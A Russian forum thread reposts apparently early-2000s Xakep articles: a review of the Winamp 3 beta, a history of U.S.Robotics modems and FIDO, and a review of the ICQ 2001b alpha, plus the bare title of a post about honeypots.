Мы ждали этого события, и вот, наконец, свершилось! 10 октября нынешнего года вышла новая версия любимого многими проигрывателя - старого доброго ВинАмпа. Естественно, мы не могли оставить без внимания такое событие - и вот тебе наши первые впечатления от третьей бета-версии сего продукта.

Новая версия?

Знакомство с пресс-релизом компании убедило, что цифра "три" в номере версии поставлена не случайно. Мол, написан он на принципиально новой "платформе кодирования" (движок, по-нашему). И это дает необычайную гибкость и легкость как для пользователей в настройке продукта, так и для сторонних разработчиков - теперь любой компонент может быть добавлен, выкинут или настроен по желанию. "Почти абсолютная свобода в создании приложений". Т.е. теперь можно не только скины менять, а вообще все переделать. И второе новшество - очень тесная интеграция с компанией Gracenote и ее сервисом CDDBТ, что даст слушателям возможность идентифицировать любую песню (исполнителя, название песни, альбома и жанр) - неважно, с родного ли CD песня или же с купленного на Митинском рынке сборника мптришек. Заманчиво, не так ли? Пришло, пришло время покопаться во внутренностях! Дистрибутив берем с www.winamp.com, его размер оказывается на 400 кило меньше, чем у последней официальной версии. По ходу дела трижды соглашаемся с тем, что это есть бета-версия для разработчиков, и никто не обещает нам работоспособности компа после ее запуска. Наконец, инсталлируем и запускаем.

Про качество звука ничего писать не буду - как был, так и остался на весьма приличном уровне. Единственное принципиальное изменение в звучании - вновь включена поддержка "Crossfade". Это когда текущая песня в списке потихонечку затухает и одновременно с эти постепенно начинается следующая - удобно для диджеев, наверное. В глаза же сразу бросается возможность изменять размеры программы - как ты помнишь, предыдущие версии позволяли максимум двукратное увеличение. И владельцы больших мониторов испытывали неудобства, особенно по утрам, пытаясь попасть в маленькие кнопочки "Play" или "Stop". Эта проблема теперь решена. Еще новшество эстетического характера - теперь по отдельности настраивается цвет каждого элемента (т.е. фон, кнопочки и иконки). Больше того - каждой песне на твоем диске можно присвоить определенные цветовые настройки (правда, у меня эта фича так и не заработала - бета-версия все-таки).

Новости и старости

Эквалайзер практически не изменился - ну, на то он и эквалайзер. Из кардинально нового в программе - появилась поддержка нескольких плэйлистов одновременно, и это реально круто. Я, например, сразу загрузил в один лист все песни с винта, после чего начал раскидывать их по темам - песни для романтического вечера, песни для бурной вечеринки и так далее. Управился намного быстрее, чем в прошлой версии. Но появился и еще один способ работы с твоими мптришками - то, что называется "Media Library". Библиотека, если можно так выразиться. При первом запуске предлагает просканировать твой винт на наличие песен, после чего радостно выдает тебе на гора список найденных.

Радует сортировка - по артисту, по альбому, по жанру, по году и даже по примечаниям. Эта штука серьезно облегчает поиск нужной мптришки - но только в том случае, если у тебя правильно прописаны все тэги. Иначе один и тот же артист будет обзываться несколькими разными именами, и толку от этого прибамбаса будет чуть. Еще полезная штука все в той же библиотеке - нажатие правой кнопки крысы на песне вызывает предложение внести ее в конец того плэйлиста, который сейчас считается активным. При нажатии той же кнопки на песне в плэйлисте тебе предложат поместить ее после ныне играющей. И там, и там есть еще вариант "редактировать свойства файла", но везде эта строка серая - недоступна, мол, пока. Бета-версия опять же...

Еще в программу теперь встроен свой мини-браузер. Его предназначение мне понять так и не удалось - при запуске появилась страница винампа, где мне было предложено скачать скрины, плагины или послушать инет-радио. Любой же выбор вызывал к жизни окошко ослика ИЕ, и дальнейшие события происходили уже в нем. Так что этот браузер - для любителей "всего в одном", реально он мало облегчает пользование. Кроме того, ни один из скачанных мной скинов, а также взятая на пробу игрушка (плагин) не встали в эту бету - заработали они только в предыдущей версии.

Пиратим, не выходя из...

Плагин, о котором стоит сказать отдельно. Конечно, то, что разговор о нем идет сегодня, - это просто совпадение. Он по времени вышел примерно одновременно с третьей бетой и ею еще не поддерживается (хотя прекрасно встал в версию 2.76). Это штучка, которая позволяет искать музыку в сети KaZaA (подробнее об этой сети и ее преимуществах я писал в 10 номере Х). Запускаешь Винамп, заходишь в сеть, открываешь плагин, вводишь слово для поиска (артист, название песни) и... обламываешься. Потому как сохранить найденную песню на диск нельзя (по крайней мере официально ;-)), а слушать ее прямо в режиме трансляции невозможно. Невозможно, если к сети тебе приходится подключаться, - ну а если ты сидишь на T3 или хотя бы на T1, то очень даже с удовольствием послушаешь.

Не только для домохозяек

Интернет-радио не то что бы очень поразило, но в целом понравилось. Список каналов дает инфу о названии станции, скорости вещания и играемой в данный момент песни. Удалось найти аж две станции любимого стиля, из них одну (с битрейтом вещания в 24) даже можно было нормально слушать - без перерывов и пауз для подгрузки контента. В списке присутствовали и наши радиостанции - типа "Европы минус" и "Радио шам-себе-сон". Любимые каналы можно загонять в плэйлист и, подключившись к сети, в дальнейшем слушать прямо их - не загружая вновь полного списка.

Еще в этой версии есть понятие скрипта. Не имеет никакого отношения ни к перлу, ни к cgi. Что же это есть - удалось понять только на прилагаемом примере. Включение его вызвало уже довольно поднадоевшую лупу, которая начала бегать за курсором и увеличивать кусок изображения под ним.

Есть и визуализация - а как же без нее. Несколько стандартных режимов, разворачивающихся на весь экран и демонстрирующих все богатство твоей видюхи и монитора. Помимо этого, есть так называемая "Студия Визуализации", в которой творится форменный кавардак - можно создавать свои варианты видео беспредела, который будет сопровождать проигрывание твоих любимых песен. Кроме того, можно скачать и уже написанные другими цветовые гаммы. Если ты, как и я, включаешь проигрывание музыки и начинаешь на компе работать, то тебе вряд ли особо пригодятся все эти режимы - тут либо картинки смотри, либо делом занимайся. Одно из трех, и пятого не дано, сам понимаешь...

И последняя прикольная фича - появился так называемый "Thinger". Это небольшое окошечко с кнопками, вызывающими к жизни любой из нужных тебе компонентов ВинАмпа - хоть основное окно, хоть нет-радио, хоть настройки эквалайзера. Привыкнув к нему, получаешь реальное удобство в работе.

Подводя итог

В общем, скажу так - бета осталась жить на моей машине. Очень понравились новые возможности работы с мптришками, разбросанными по всем винтам. К основным же недостаткам стоит отнести невозможность проигрывания компактов (да, мне так и не удалось заставить прогу играть мои диски) и... общее впечатление сырости, что ли. Там - невозможно переключить активное окно - зацепится курсор за основное (тогда все движения мышой приводят только к его судорожным подергиваниям вверх и вниз по экрану), и для перехода в плэйлист надо свернуть все окна, а затем развернуть - тогда, может, и получится. Здесь - стоит добавить радио в плэйлист - и все находившиеся там до этого песни загадочным образом пропадают из списка. Понятно, что эти недостатки наверняка будут устранены к выходу официальной версии, каковая обещается в первой половине будущего года. А так - рекомендуется для скачивания либо фанатам именно ВинАмпа, либо же тем, кого, кроме удобства работы с файлами, ничего и не интересует. Так что думай сам, решай сам, а если какие вопросы - пиши, не стесняйся.




Автор: Metallica Dec 14 2006, 12:07

USR - это наше все Исторический обзор продукции U.S.Robotics



Как появилась компания U.S.Robotics

Начало семидесятых годов - эра бурного роста микропроцессорных технологий и становления основных направлений компьютерного бизнеса. За несколько лет полупроводниковая промышленность выросла практически из ничего в громадную индустрию с оборотом в миллиарды долларов. Многие известные сегодня компании создавались талантливыми инженерами и предпринимателями именно в то время. К 1977 году, когда стоимость процессоров в очередной раз снизилась вдвое, о потенциальных возможностях персональных ЭВМ начали задумываться во многих компаниях. MITS (Micro Instrumentation Telemetry Systems) разработала микрокомпьютер "Альтаир" на базе процессора Intel 8080 с оперативной памятью 1Kb и языком программирования Basic, написанным Биллом Гейтсом и Полом Алленом из Micro-Soft (так выглядело первое название этой организации). Компьютер стоил около 400$ и потому был доступен многим. Вскоре появился ПК Apple и многие другие. При широком распространении персональных компьютеров возрастала необходимость в устройствах связи, способных передавать данные на большие расстояния.

В 1976 году молодые выпускники чикагского университета Пол Коллард, Том Россен, Стэн Меткалф и Стефен Мука во главе с Кейси Коуэллом создали свою фирму и назвали ее U.S.Robotics. Название они взяли из повести известного писателя-фантаста Айзека Азимова "Я Робот". В повести Азимова рассказывается о гигантской компании-монополисте U.S.Robots по производству говорящих роботов. Наверное, мечтая создать такую же крупную компанию, молодые бизнесмены решили назвать свою маленькую фирму U.S.Robotics, хотя она и не имела никакого отношения к роботам. Стартовый капитал составлял около $200 в виде компьютерных комплектующих, необходимых для начала работы, а офис находился в помещении, принадлежащем отцу Тома Россена, возле военно-морских складов Чикаго. Кэйси Коуэлл стал главой компании и оставался ею почти 20 лет.

Первой идеей было создание терминала для ЭВМ, но потом все же решили разрабатывать акустические устройства, преобразующее цифровые данные, поступающие от компьютера, в звуковой сигнал, чтобы его можно было передать на другой удаленный компьютер по обычной телефонной сети. Такое устройство называется Acoustic Coupler - прообраз современного модема. Его не надо подключать к телефонной линии, а достаточно приложить к телефонной трубке, чтобы звук передавался на удаленную сторону. В 1978 году фирма предлагала свои первые Acoustic Couplers, работающие на скорости 300 бит/сек. Поначалу продажи шли очень вяло, и двое из основателей (Том Россен и Стэн Меткалф) покинули U.S.Robotics в первый же год, не веря в успех предприятия. Но несколько знаменательных событий, произошедших в течение последующих двух лет, кардинально изменили ситуацию.

Так, в 1978 году Деннис Хайес основал компанию Hayes Microcomputer Products и уже в следующем году выпустил на рынок Micromodem II на 110/300 бит/сек для персональных компьютеров Apple II. Еще более важное событие произошло в 1980-м, когда Hayes Microcomputer выпустила Smartmodem 300, так называемый "умный модем", который умеет воспринимать AT-команды и позволять пользователю в интерактивном режиме управлять модемом. Набор AT-команд фирмы Hayes быстро стал фактическим стандартом, а модемы, поддерживающие его, теперь называются Hayes-совместимые. В 1979 г. Международный Консультативный Комитет по Телеграфии и Телефонии (CCITT) принимает первую модемную рекомендацию V.21, определяющую стандартный протокол модуляции на скорости 300 бит/сек., а в 1980-м - рекомендацию V.22 на 1200 бит/сек. Эти события во многом предопределили развитие модемной индустрии, а стандартизация протоколов и единой системы команд позволила производителям разрабатывать максимально совместимые друг с другом изделия.

Все это сразу отразилось на делах фирмы U.S.Robotics. Рост популярности персональных компьютеров и увеличение объемов их продаж привели к такому же спросу на устройства связи, и это не могло не сказаться на улучшении финансового положения U.S.Robotics. В 1984 году U.S.Robotics уже перебирается в просторную штаб-квартиру в Скоки (пригород Чикаго).

Courier и HST

В 1984 году в Женеве на заседании Комитета CCITT была утверждена очередная рекомендация на передачу данных по телефонным сетям общего пользования V.22bis, описывающая дуплексную передачу данных со скоростью до 2400 бит/сек. В том же году на международной выставке COMDEX'84 многие компании представили свои разработки модемов V.22bis, а в 1985 году U.S.Robotics объявляет о выпуске своего нового модема Courier 2400.

Модем был выполнен в большом черном корпусе с многочисленными красными индикаторами на передней панели и выглядел очень солидно. Стоила эта штука безумно дорого - около $1000, а в основу модема легли микроконтроллер Intel 8031 и процессор обработки сигналов TMS32020 фирмы Texas Instruments. Спустя два года фактически этот же модем, но с другой микропрограммой выпускается под названием Courier HST 9600. В дальнейшем все новые разработки U.S.Robotics велись преимущественно на процессорах Intel и Texas Instruments.

Протокол HST (High Speed Technology), несмотря на свою простоту, позволил значительно поднять скорость, не изменяя при этом аппаратной базы модема. По сути HST это полудуплексный протокол, представляющий собой урезанную версию V.32 и не позволяющий передавать данные в обоих направлениях одновременно. Поэтому ему требуется значительно меньше вычислительных ресурсов, чем в случае с дуплексным протоколом V.32. Помехоустойчивость HST значительно выше, т.к. отсутствует сложная процедура эхо-компенсации. Если другим фирмам для производства модема 9600 с протоколом V.32 приходилось разрабатывать другую, более мощную аппаратуру, то U.S.Robotics убил сразу двух зайцев: с помощью фирменного протокола HST удалось создать одновременно и высокоскоростной, и помехоустойчивый модем, причем без существенных капиталовложений в производство. Новая цена на Courier HST 9600 в 1987 году составляла $995, а внешний вид по сравнению с Courier 2400 не изменился
В 1988 году компания U.S.Robotics вынуждена переработать архитектуру своего модема Courier, так как новый дуплексный протокол V.32, принятый Международным Комитетом CCITT, требует значительно больше вычислительных ресурсов, нежели предыдущий V.22bis. Сердцем модема стал 188-ой микроконтроллер от Intel, плюс более мощный сигнальный процессор TMS320C25. Модем назвали Courier Dual Standard (поддерживающий два стандарта: V.32 и HST), а начальная цена была точно не для бедных студентов - $1500. Отметим, что с самого начала модемы Courier позиционировались на рынке как устройства бизнес-класса для корпоративных пользователей и организаций, а потому и стоили весьма недешево (по сравнению с модемами других производителей).

В 1991 году дизайн Courier'а преображается - корпус становится компактнее, световые индикаторы - прямоугольными, появился переключатель Voice/Data на передней панели, а регулятор громкости встроенного динамика стал движковым. С появлением в 1994 году нового протокола V.34 Courier DS переименовали в Courier V.Everything, что означало поддержку всех стандартных рекомендаций ITU-T (бывшая CCITT ) серии V.* Вот уже более десяти лет меняется только начинка модема и иногда название, а внешний вид остается прежним, поэтому Courier всегда легко узнаваем среди тысяч других модемов.

Сегодня компания U.S.Robotics выпускает обновленную версию модема 3COM Courier V.Everything с технологией V. Everywhere. Теоретически эта технология обеспечивает приспособление модема к стандартам любой страны - достаточно дать одну команду, и вся микропрограмма адаптируется к работе в новых условиях. На практике все иначе. Для российского пользователя модем лучше не стал, а отсутствие к нему модернизированных прошивок (таких как AVC-56), сокращает возможности модема. Но это уже отдельная тема для другой статьи.

Sportster

Возрастающий спрос на модемы среди обычных пользователей заставляет компанию задуматься о более дешевом варианте модема для домашнего и индивидуального использования. И было найдено довольно оригинальное решение: сохранить аппаратную архитектуру Courier'a и значительно урезать возможности микропрограммы управления. Поместив все это в маленький белый корпус (в противоположность большому и черному у Courier), фирма выпустила на рынок Sportster V.32. Это решение позволило, с одной стороны, избежать крупных затрат на разработку новой аппаратуры и программного обеспечения под нее, с другой стороны, быстро удовлетворить пользовательский спрос на качественный модем, сравнимый по надежности с линией продуктов Courier. Такая рационализация имела большой успех у российских пользователей, которые разработали несложные приемы, позволяющие переделать Sportster обратно в Courier (аппаратура-то одинаковая) и воспользоваться функциональными возможностями последнего за значительно меньшую цену.

Правда, не всегда новые разработки оказывались столь успешными. Так в 1995 году было принято решение разработать новую аппаратуру для популярной линии дешевых модемов Sportster. Так как до сих пор они делались на базе Courier'a, то при постоянном снижении цен на модемы производить их, вероятно, становилось все менее выгодно. Модем значительно упростили, оставив только один процессор, а большую часть мелкой логики собрали в один заказной чип. Однако новая микропрограмма управления поначалу имела так много ошибок, что U.S.Robotics пришлось отзывать несколько крупных партий проданных модемов.

Winmodem

После выхода в 1995 году новой графической оболочки Windows 95 и ее последующего широкого распространения U.S.Robotics выпускает новый продукт для домашнего пользователя под названием Sportster Winmodem. Это более дешевый вариант внутреннего спортстера, который содержит только сигнальный процессор и аналоговый интерфейс с телефонной линией; все остальные функции (управление модемом, коррекция ошибок и сжатие данных) возлагаются на драйвер, работающий под управлением Windows. Благодаря своей дешевизне, такой модем быстро нашел признание пользователей Интернет, хотя и обладал рядом недостатков. Создавая дополнительную нагрузку на процессор, да еще и под управлением постоянно зависающей Win95, Winmodem был очень ненадежным устройством.

Сейчас производительность центрального процессора выросла настолько, что уже всю сигнальную обработку, которая раньше выполнялась в DSP модема, можно перенести на центральный процессор ПК. При этом загрузка не превышает 10% от PentiumIII-700, а ОС Windows-2000 уже обладает достаточной надежностью, чтобы софт-модем работал вполне сносно.

Формула успеха

Основой успеха компании стали собственные разработки в области передачи данных и реализации протоколов. Если другие модемные фирмы в целях удешевления своих устройств использовали чипсеты (наборы микросхем) от крупных производителей (к примеру, AT&T или Rockwell), то фирма U.S.Robotics всегда применяла в своих изделиях универсальные процессоры и самостоятельно разрабатывала уникальные алгоритмы управления для них. Немалую роль сыграло и то, что при проектировании аппаратуры модема разработчики всегда делали запас на будущее, поэтому при появлении нового протокола или повышении скорости передачи данных не нужно было создавать новое устройство - достаточно лишь доработать микропрограмму управления старого. Пользователь, купивший Courier 2400, мог запросто повысить скорость своего модема до 9600, заплатив небольшую сумму за модернизацию. На протяжении всей своей истории U.S.Robotics постоянно пользовалась этим преимуществом, выпуская новые разработки раньше своих конкурентов на несколько месяцев, а также предлагая программный апгрейд устаревших моделей на более современные технологии.

В России идея программной модернизации изделий U.S.Robotics приобрела совершенно иной смысл. Благодаря тому, что в модемах USR используются универсальные микропроцессоры Intel и TI, существует возможность самостоятельно, чисто программно улучшать пользовательские свойства модемов и вносить туда такие изменения, которые вряд ли когда появятся в оригинальном исполнении от фирмы-производителя. С последними достижениями в деле адаптации модемов Courier и Sportster к российским условиям можно ознакомиться и совершенно бесплатно получить на сайте www.usrmodem.ru. Модемы Courier приобрели голосовые функции и АОН, а также массу настроек и регулировок. Некоторые модели обычных факс-модемов U.S.Robotics также приобретают вторую жизнь - нормальное распознавание сигналов "занято", плавная регулировка громкости встроенного динамика, голосовые функции и ряд других
В нашей стране история модемов вообще и U.S.Robotics в частности неразрывно связана с историей развития сети FIDO. Для тех, кто не знаком с FIDO, кратко поясню, что это такое. Основным отличием FIDO от других глобальных сетей является то, что она с самого начала задумывалась как "сеть друзей" - людей, объединенных общими интересами, а не как средство извлечения выгоды или полигон для военных (как было с ApraNet/Internet). Возникнув в 1984 году как сеть BBS (электронных досок объявлений) в США, она превратилась в сообщество, объединяющее людей во всем мире. Хотя многие благие намерения создателей оказались невыполнимы, сеть росла и общая ее идея сохранилась.

В России FIDO появилась в 1990 году благодаря многочисленным энтузиастам и фанатам персональных компьютеров. Интернета у нас тогда еще не было, а потребность продвинутых программистов и пользователей общаться друг с другом постоянно возрастала. Для решения этой проблемы и была организована сеть из разрозненных BBS-ок, которая стала быстро расширяться и пополняться новым участниками. Распространение электронной почты в FIDO тогда шло только по телефонным линиям, а для этого, конечно, необходим модем, и желательно надежный, способный работать на междугородних непробиваемых каналах типа Москва - Новосибирск. В начале 90-х для этого использовались преимущественно модемы 1200 V.22 малоизвестных сейчас фирм, без протоколов коррекции ошибок с примочками к fossil'у, эмулирующими MNP2 и MNP5. Вскоре появились и прочно обосновались на нашем рынке модемы ZyXEL 1496 на 19200бит/сек. USR Courier может и обладал некоторыми преимуществами перед ZyXEL (хотя бы наличие HST), но был слишком дорог и встречался довольно редко. Переломным в этой ситуации стал 1993 год, когда начался массовый завоз в нашу страну дешевых и качественных USR Sportster 14400. Хотя там отсутствовал HST и максимальная скорость была ниже, чем у ZyXEL, но на протоколе V.32 этот модем работал вполне сносно, и Sportster заслуженно стал народным модемом - самым дешевым из брендов. Через некоторое время появились адаптированные российские прошивки к ним и возможность делать upgrade, различными способами превращая Sportster в Courier, что еще больше способствовало их популярности.

Откровенно говоря, реализация протокола V.32 в модемах U.S.Robotics являлась далеко не самой лучшей из существующих разработок, особенно в моделях Sportster. К примеру, "фирменной" особенностью этих модемов было неумение повышать битовую скорость (fallforward), поэтому, если модем снижал скорость во время сеанса, например, из-за помех в линии, то повысить он ее уже не мог. Особенно ошибки были заметны на линиях плохого качества. ZyXEL в этом плане работал значительно лучше, чем USR Sportster. Впоследствии некоторые ошибки исправлялись нашими независимыми специалистами в рамках работ по локализации изделий USR.











Автор: Metallica Dec 14 2006, 17:45

Аленький цветочек

Ну, положим, он не совсем аленький, точнее - совсем не аленький. Да и работа с последней его версией отнюдь не напоминала сказку. Однако обо всем поподробнее, обстоятельно и прямо сейчас.

Для тех, кто не понял, о чем это я, и, удивленно почесывая бронированный лоб, восклицает: «Чо это, ][ сказки печатать начал?», поясню, что в начале октября AOL представил изумленной общественности новую версию своего клиента, которого все занудные новостные агентства почему-то упорно называют ICQ, однако мы-то с тобой знаем, что на самом деле это зовется «аськой» и никак более ;-). Потому и цветочек. Ну, а учитывая то, что последний раз ][ описывал аську во все дыры более года назад, эту статью вполне позволительно назвать возвращением к теме.

Итак, маэстро - музыку! На арене - ICQ 2001b alpha (build 3619). Я подозреваю, что большинство читающих сии строки активно юзают различные беты ICQ 2000, ну а мастодонты так вообще сидят в 98-й аське, и ничего больше им от жизни не нужно. Всю же прогрессивную часть нашей community с выходом новой версии волнует, в основном, один вопрос: что это за зверь, лучше он предыдущего или нет, и если лучше, то стоит ли ставить?

Что тут дают?

Первое, что приходит в голову, - это описать все новые фичи аси. Важно другое - насколько новые опции полезны для нас, чтобы мы тут же бросились забивать трафик даунлоадерами или же, наоборот, плюнули на все. Разумеется, на том же icq.com все нововведения расписаны в самых восторженных тонах, как самые необходимые и фантастически полезные. Но чего-то я им не верю: было бы странно, если бы они писали обратное smile.gif. Посему давай разберемся, что тут к чему и что оно нам дает. После представления каждой новой функции я попытаюсь объективно оценить ее пользу smile.gif


Не все фьючерсы одинаково полезны

Во-первых, процедура установки новой аськи превратилась для «нашего человека» в нетривиальный процесс. Все дело в том, что с сайта AOL'а сливается лишь утилита-инсталлятор в 223 кб весом, которая при запуске вежливо предлагает тебе выбрать тип установки: «стандартный» и «по выбору» (кстати, когда, наконец, этот пункт перестанут тупо называть «Advanced"? Неужели нужно быть гением, чтобы всего лишь ткнуть крысой в те приблуды, которые хочешь установить?). После этого прога стучится на ftp-шник Мирабилиса и сама начинает скачивать выбранные фьючерсы для установки.

Увидев это и вспомнив, что предыдущая аська весила пять с лишним мегов, я выронил из рук бутылку с минералкой (да-да, минералкой!) и бросился было писать редактору письмо в духе «а не пошел бы ты со своим заданием написать про аську, ибо с моим коннектом за один раз такое фиг сольешь». Однако, к моему счастью, новый дистрибутив похудел до трех мегабайт, дисконнектов не было, и аська резво засетапилась, без вопросов встав поверх старой версии. В итоге, зная наши линии связи, могу посоветовать тебе при установке выбирать только самые необходимые компоненты, а остальные докачивать потом, по мере надобности, благо они теперь реализованы в виде удобных плагинов: если ты запускаешь отсутствующий сервис, аська предложит тебе скачать его и запустит либо сразу же, либо потом, по требованию. Напротив таких, неустановленных сервисов, стоит надпись Activate.

Итак, вопрос - удобно ли это? С одной стороны, в свете все более разбухающих (в плане размера) программных продуктов, похудение тети аси (тетя стала более стройной ;-) выглядит весьма и весьма выгодно (даже полная установка всех функций весит меньше предыдущей версии проги), плюс к тому - качаем не все, в том числе то, что нам не нужно, а по собственному выбору (то, что скачать нужно точно, это инсталлятор и непосредственно клиент, они занимают львиную долю размера «полного» дистрибутива). С другой стороны, даунлоадить три мегабайта без возможности докачки - стремненько, но буржуи на своих толстых каналах не знают, что такое дисконнект, а посему, если решишь ставить, то столкнуться тебе с этим придется sad.gif.

Да, кстати, еще одна фишка: при установке аська теперь, как заявляют разработчики, сама определяет настройки твоего файрвола (если он есть ;-), что исключает конфликты. Не знаю, не знаю, но мой Zone Alarm Pro асю на бескрайние просторы Сети выпустил, однако новая вкусная фича - передача файлов (о ней ниже) - сразу не пошла, и с брандмауэром пришлось малость повозиться (радикалы в таких случаях отрубают его на фиг smile.gif. Но это был лишь начальный этап. И вот программа установлена и готова к тому, чтобы ее помучили. Запускаем!


Морда лица

О таких мелочах, как упрощенный для юзанья дизайн и положение настроек, говорить не буду - все это банально, очевидно и набило оскомину (как микрософтовское «тесная интеграция с вебом» smile.gif, ибо есть неотъемлемая часть новой версии любой программы как стремление последней к совершенству пользовательского интерфейса (во как!).

А что же внутри? Продолжаем шагать по новым функциям, самой заметной из которых является возможность передачи файлов между юзерами. Выглядит это так: ты либо можешь отправить файло отдельному челу, выбрав соответствующий пункт меню в диалог-боксе, либо дать доступ к своему архиву сразу всем. Для этого создается специальная расшаренная папка, которая, собственно, так и зовется: ICQ Shared Files, которая видна всем и в которую ты скидываешь самые непристойные картинки на всеобщее обозрение. Припоминаешь DCC-клиент в IRC? Так вот, тетька аська решила не отставать от тетьки ирки :-)). О, я сплю и вижу, когда в разговоре на вопрос «откуда ты взял дистрибутив новой винды» последует ответ: «вчера по аське слил». Варезники в нирване! А если серьезно, то очень интересно посмотреть, как на это отреагируют противники Напстера и ему подобных. Разумеется, полезность этой фичи не вызывает сомнений, особенно если твой собеседник - ярый ненавистник IRC (там есть ДЦЦ). Но напомню, что у меня файло стало передаваться стабильно лишь после разговора по душам с файрволом. Да, кстати, в новой ICQ остались баннеры как дурное наследие предыдущих версий. Однако об этом я молчу: от них и в старых аськах нормальные люди легко избавлялись, избавятся и в

этой. Между прочим, в моей предыдущей ICQ2000b реклама была заботливо вырезана (способом, упомянутым мною в ][#9, в статье «Джентльменский набор»), а проинсталлив новую версию, я с изумлением увидел, что в ней баннеры также отсутствуют, и лезть по второму разу в eXescope не пришлось smile.gif

Следующая вкусная фича аси - новые возможности в работе с контакт-листом. Причем заботливая тетя не просто сама сохраняет его каждые пять сеансов, но и позволяет утянуть свой (или не свой wink.gif лист контактов с сервера ICQ. Что это значит? А то, что теперь, решив заиметь асю на нескольких машинах, тебе не придется бегать к ним с контакт-листом на дискетке - достаточно загрузить его с пресловутого сервака. Удобно! В довершение этого ты можешь проделать в новой аське следующие финты: получить от любого перца в твоем контакт-листе часть его контактов (по обоюдному согласию smile.gif, а также заранее авторизовать у себя чела, которого ты добавляешь в список в случае включенной у тебя и у него опции «authorization required». То есть, если ты кого-то добавил и «ждешь авторизации», то челу достаточно авторизовать тебя у себя, так как у тебя он уже авторизован тобой заранее при добавлении smile.gif) Ты не запутался? Хорошо, скажу проще: наконец-то появилась возможность избежать дурацких запросов типа «авторизуй меня!!» - «а теперь ты меня!!!». Надо сказать, подобные возможности давно были желаемы требовательными юзерами, а потому восприняты ими на ура. «Ну а если кто-нибудь в очередной раз взломает сервак АОЛ'а и доберется до контакт-листов?» - спросишь ты. Да кому, на фиг, нужны твои жалкие контактики, отвечу я smile.gif.

Идем дальше и кидаем свой взгляд на окошко, в котором ты перекидываешься мессагами. Тут изменения особенно заметны. Во-первых, для тех, кого не устраивают сочетания скобочек, восьмерочек и двоеточий, появилась новая фича: теперь ты можешь вставить в мессагу любое смайло по выбору, и, как видишь на скрине, выбор их достаточен, все они довольно убоги, но забавны smile.gif. Абсолютно так же, пиктограммами, можно выставить и свое настроение (картинки еще более убоги). Не знаю, может, кого-то эта фича и пропрет, но для меня так ничего лучше восьмерки с закрывающей скобкой в качестве смайлика еще не придумали 8).

Кроме этого, теперь в аське есть такая немаловажная для тех, кто боится прослыть безграмотным, функция, как проверка орфографии. Впрочем, можешь закатать губу обратно, так как опционально она настроена на английский язык, стало быть, любое русское слово для нее - незнакомое (помимо дефолтового английского там присутствует еще несколько словарей, но русского, увы, среди них нету). Может, потом выйдет какой-нибудь language pack, однако на момент написания статьи его замечено не было. Посмотри, какую альтернативу предложил этот горе-корректор слову Xakep. Скажи мне, причем

тут косметика?

Ну и, наконец, если ты вконец не дружишь с английским, то можешь использовать небезызвестную софтину LingoWare для перевода аськиного фейса на родной язык. Впрочем, этого я тебе делать категорически не рекомендую, ибо переводит он весьма посредственно. Еще из новых опций упомяну возможность послать одну и ту же мессагу юзеру сразу по аське, мылу и SMS, и все это -

не вылезая из диалогового окна, просто ткнув соответствующую галочку! Во как, теперь ты можешь заспамить бедного чела в три раза сильнее smile.gif. Все это, конечно, хорошо, но не срывайся лететь качать новую асю, ибо в конце я (а точнее, разработчики клиента) приготовили тебе большущую ложку дегтя.

Баг или фича?

Все дело в том, что по старой доброй традиции Мирабилис выкладывает в сеть альфа и бета версии своей проги, подразумевая, что юзать ты их будешь на свой страх и риск, и за возможные сбои он не отвечает. Вот и сейчас нам досталась самая первая альфа версия новой аськи, и багов в ней - навалом, причем с некоторыми нельзя мириться. В силу особенностей печатного цикла журнала я вполне могу предположить, что к тому времени, как ты будешь держать этот номер ][ в руках, ICQ inc. разразится новым бета-релизом, и большинство описанных багов будут уже неактуальны, однако что мы имели - то мы и рассказываем. А имели мы (во всех смыслах smile.gif ICQ 2001b alpha build 3619.

И вот какие ужасы предстали перед нами.

Во-первых и «в-главных», новая ася время от времени имеет некоторые проблемы с мессагами на русском языке. Выглядит это так: ты бурно общаешься с какой-нибудь девчонкой, хочешь выразить все свои чувства к ней, набиваешь многокилобайтное послание о том, как она прекрасна, как ты ее любишь и все такое, и жмешь кнопку «send». Сердце твое подскакивает до заоблачных высот и замирает в ожидании: что же она ответит?... А она отвечает тебе: «Чего ты мне за байду написал, я вижу одни знаки вопроса???». Альфа-версия ICQ, господа, прошу любить и жаловать! Ошибка в обработке принятых сообщений в кириллице собственной персоной. Но это еще не все. Баг номер два - в том, что ICQ 2001b alpha некорректно обрабатывает ввод мессаги. Если ты набил километр текста и курсор дошел до края окна, то попробуй нажми пробел: текст не перескочит на нижнюю строчку, как ты того ожидаешь. Глюк-с. Кроме того, в процессе активных испытаний нами были замечены проблемы с обработкой запроса на авторизацию и добавления юзера в контакт-лист (он все время сваливался в awaiting authorization или пропадал из листа вообще), также ася имеет обыкновение менять шрифт по ходу общения (в отдельных мессагах). Ну и, наконец, чисто специфическая бага: заинсталлив аську в своем винтукее, как и положено, под рутом, я столкнулся с определенными проблемами при запуске ее из-под менее привилегированного пользователя.

Это только самые очевидные баги. В первой альфа-версии их еще много. Но, повторюсь, сейчас, когда ты все это читаешь, они уже могут быть исправлены. А могут и не быть smile.gif.

(2b) || !(2b)

To be or not to be - качать или не качать, ставить или не ставить. Ты еще не ответил себе на этот вопрос? Что, твердо решил не изменять своей двухтысячной? Или, наоборот, уже качаешь инсталлятор? Давай прикинем. Разумеется, у новой аськи есть плюсы (было бы смешно, если бы это было не так). Какие из них для тебя реально полезны - решай сам, я свою точку зрения высказал. Мое твердое мнение: пока не будет нового надежного релиза 2001-й аськи, обновлять ее не стоит (если только ты не экстремал и не любишь все самое свежее, пусть и глючное). Новые возможности удобны, однако не революционны, и можно вполне прожить без них. Однако текущие баги, в особенности - с обработкой мессаг в кириллице, здорово портят жизнь. Как только их исправят (если уже не исправили), можешь смело пробовать новую версию ICQ на вкус. Ну а я, почесав затылок, плюнул и оставил затестированную во все дырки тетю асю, простив ей ее кривоватость: мне с глючным софтом сражаться не впервой...




Автор: Metallica Dec 14 2006, 23:05

"Горшочек меда" как способ обмана кульных хацкеров



